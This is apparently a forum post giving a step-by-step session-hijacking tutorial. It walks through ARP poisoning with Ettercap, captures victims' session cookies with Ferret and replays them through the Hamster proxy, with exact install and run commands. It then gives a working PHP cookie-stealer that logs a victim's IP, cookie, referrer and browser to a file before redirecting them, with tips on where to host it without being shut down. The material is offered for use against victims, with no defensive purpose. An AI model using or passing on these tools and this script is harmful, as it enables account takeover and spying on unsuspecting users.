#48733313 · 5 Sep 2016, 14:20 · · პროფილი · პირადი მიმოწერა · ჩატი
You need three tools:
Hamster [ proxy that manipulates things grabbed by ferret ]
Ettercap
Ferret [ used to grab session cookies ]
Ferret doesnt come with 64 bit version so, we have to add i386 architecture.
>dpkg --add-architecture i386
>apt-get update
>apt-get install ferret-sidejack:i386
First of all you have to do APR poisioning.So use ettercap to arp poisioning and start sniffing. [ i am skipping this step if you have problem in arp poisioning then you can ask it in comments ]
>ferret -i [INTERFACE]
>hamster
To view cookies simply open browser and type in URL box 127.0.0.1:1234
Now you will see proxy, adapters, packets, database, targets
Now go to apdapters and enter the interface you used in ferret. Then it will ask for submitting query. Now to view cookies click on the IP address and you see what the victim is doing until he/she is logged in.
2) You can also create a php malicious link. You can use free web hosting services also but they will deactivate your website if they found this.
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$cookie = $_GET['cookie'];
$referer = $_SERVER['HTTP_REFERER'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$redirect = $_GET['redirect'];
$data = "IP: " . $ip . "\n" ."Cookie: " . $cookie . "\n" ."Referrer: " . $referer ."\n" ."Browser: " . $browser . "\n\n";
$log = "cookie.txt";
@chmod($log, 0777);
$f = fopen($log, 'a');
fwrite($f, $data);
fclose($f);
@header("Location:urloforiginalwebsite");
?>
|
paste
